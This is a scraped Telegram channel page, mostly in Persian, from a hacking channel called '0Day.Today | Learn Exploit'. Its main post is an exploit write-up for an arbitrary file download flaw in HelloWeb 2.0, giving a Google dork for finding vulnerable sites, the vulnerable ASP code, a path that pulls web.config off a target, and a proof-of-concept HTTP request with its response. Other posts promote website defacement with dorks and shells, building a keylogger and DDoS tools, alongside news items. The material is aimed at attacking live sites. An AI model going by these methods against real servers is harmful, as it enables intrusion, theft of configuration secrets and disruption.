0Day.Today | Learn Exploit | Zero World | Dark web |
18.7K subscribers
1.23K photos
122 videos
487 files
1.26K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
آموزش ساخت پسورد لیست با ابزار قدرتمند crunch در کالی لینوکس

#kali #linux #password #passlist #crunch

iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش دیفیس سایت با دورک (3)

#Deface #shell #dork #google_dork

iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#Exploit #WebApp #HelloWeb #Arbitrary #File #Download #vulnerabilities
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه

با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.

IR0Day.Today Guy's
@LearnExploit
@Tech_Army
#Exploit #WebApp #HelloWeb #Arbitrary #File #Download #vulnerabilities
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه

با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.

ابتدا توضیح مختصری در مورد باگ Arbitrary File Download بدیم :
به زبان ساده اگر توضیح بدم نوع دیگری از باگ ها LFI/RFI میباشد.
با این تفاوت که شما در این باگ قابلیت Travel Dir رو‌ندارین! یعنی نمیتونید بین مسیرهای موجود گشت و گذار کنید و فقط میتونید فایل یا فایل های مد نظر رو دانلود کنید.(البته بعضی از پارامتر های موجود این قابلیت رو داره).
اگه هنوز با باگ های LFI و RFI اشنا نیستید روی لینک های زیر کلیک کنید.
Link

#Exploit-Title : ( HelloWeb 2.0 - Arbitrary File Download )

#Dork : ( Inurl:exec/file/download.asp )

#vulnerable-Code :

filepath = Request.QueryString("filepath")
filename = Request.QueryString("filename")
filepath = Replace(filepath,"/","\")

root_path = server.MapPath("/")
Set fso = CreateObject("Scripting.FileSystemObject")
Set root_folder = fso.GetFolder(root_path)

attachfile = root_path & filepath & "\" & filename

Response.Clear
Response.ContentType = "application/unknown"
Response.AddHeader "Pragma", "no-cache"
Response.AddHeader "Expires", "0"
Response.AddHeader "Content-Transfer-Encoding", "binary"
Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename)

Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open

objStream.Type = 1
objStream.LoadFromFile attachfile

Response.BinaryWrite objStream.Read
Response.Flush

طبق کد های مد نظر! این کد ها دسترسی دانلود فایل رو‌برای ما میده.
پارامتر هایی که اسیب‌پذیر هستند :
filtepath - filename - root_path - fso - root_folder - attachfile - objStream - strFile

چطوری میتوان از پارامترهای اسیب پذیر استفاده کرد :
به مثال زیر دقت کنید :
https://Target/download.asp?filepath=/&filename=hello.pdf

در این URL ما میفهمیم که فایل Download.asp اجازه ی دانلود فایل از مسیر / ( مسیر فعلی که ما هستیم)و فایل hello.pdf رو داده ...

نحوه ی اکسپلویت این باگ :
#Exploit :
ابتدا با استفاده از دورک‌ سایت اسیب پذیر رو پیدا کنید.
سپس
exec/file/download.asp?filepath=/&filename=web.config
رو‌به اخر هدفتون اضافه کنید.
البته این یک نمونه هست !
شما میتونید فایل های بیشتری رو‌ با پارامتر متفاوت تست کنید.

#PoC
تست :
این تست روی لوکال هاست صورت گرفته.

GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

RESPONSE: (پاسخ)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/unknown; Charset=utf-8
Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT
Server:
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename = web.config
Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/
Access-Control-Allow-Origin: *
x-xss-protection: 1; mode=block
Date: Thu, 09 Jul 2020 10:51:14 GMT
Connection: close

نحوه ی Fix این باگ تو پست بعدی براتون شرح میدم.
امیدوارم که با کارتون بیاد...
هرگونه سوالی داشتید میتونید توی گروه بپرسید.
#X0P4SH4

IR0Day.Today Guy's
@LearnExploit
@Tech_Army
آموزش ساخت کیلاگر با ابزار Hatkey در کالی لینوکس

نوشته شده با پایتون

#Keylogger

iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش دیفیس سایت با دورک (4)

#Deface #shell #dork #google_dork

iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش ddos/dos با ابزار hammer در کالی لینوکس

Github Link

#ddos #dos #tools #kali #linux

iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#فوری #مهم

خیلی فوری: سازمان‌ها و شرکت‌های ایرانی حواسشون باشه که یه آسیب‌پذیری با درجه خطر ۱۰ از ۱۰ در سرویس DNS ویندوز پیدا شده که روی ویندوز سرورهای ۲۰۰۳ تا ۲۰۱۹ جواب میده! اونقدر خطرناکه که ممکنه تمام زیرساخت‌تون رو با دسترسی Domain Admin به مهاجم تقدیم کنه. همین حالا به‌روزرسانی‌هارو انجام بدید.

منبع : آفسک

iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
ساعاتی پس از آنکه سخنگوی قوه قضائیه جمهوری اسلامی اعلام کرد دیوان عالی کشور حکم اعدام سه جوان را که در اعتراضات سراسری آبان حضور داشتند تایید کرده است، صدها هزار کاربر توئیتر با هشتگ «اعدام نکنید» توفان توئیتری به راه انداختند.

همزمان با گسترش این هشتگ در توئیتر و برخی دیگر از شبکه‌های اجتماعی، وبسایت‌های رصدکننده اینترنت در جهان خبر دادند که دسترسی به اینترنت در داخل ایران با اختلال روبه‌رو شده است.

خبر تایید حکم اعدام امیرحسین مرادی، سعید تمجیدی و محمد رجبی را ابتدا چند روز پیش یکی از وکلای آنها منتشر کرده بود و سخنگوی قوه قضائیه روز سه‌شنبه ۲۴ تیر رسما این خبر را تایید کرد. راديو فردا

——————
0Day.Today
@LearnExploit
@Tech_Army
4 اپلیکشین معروف هک و امنیت برای اندروید

iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
پولی که امشب هکرها از هک حساب‌های مهم توییتری در اوردن تا این ساعت بیشتر از ۱۴ برابر مقداریه که خود توییتر در برنامه جایزه کشف باگ می‌داده!

منبع : آفسک

iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
پولی که امشب هکرها از هک حساب‌های مهم توییتری در اوردن تا این ساعت بیشتر از ۱۴ برابر مقداریه که خود توییتر در برنامه جایزه کشف باگ می‌داده! منبع : آفسک iliyahr —————— 0Day.Today @LearnExploit @Tech_Army
به نظر میاد سیستم هویت سنجی توییتر هک شده و نه اینکه فقط چند فرد معروف هک شده باشن ، یعنی فرد / تیم هکر حتی به حساب من و شما هم میتونستن دسترسی بگیرن .

هدفشون هم که کلاهبرداری با بیت کوین بوده ( هرچند کارای بزرگ تری هم میتونستن بکنن )

iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army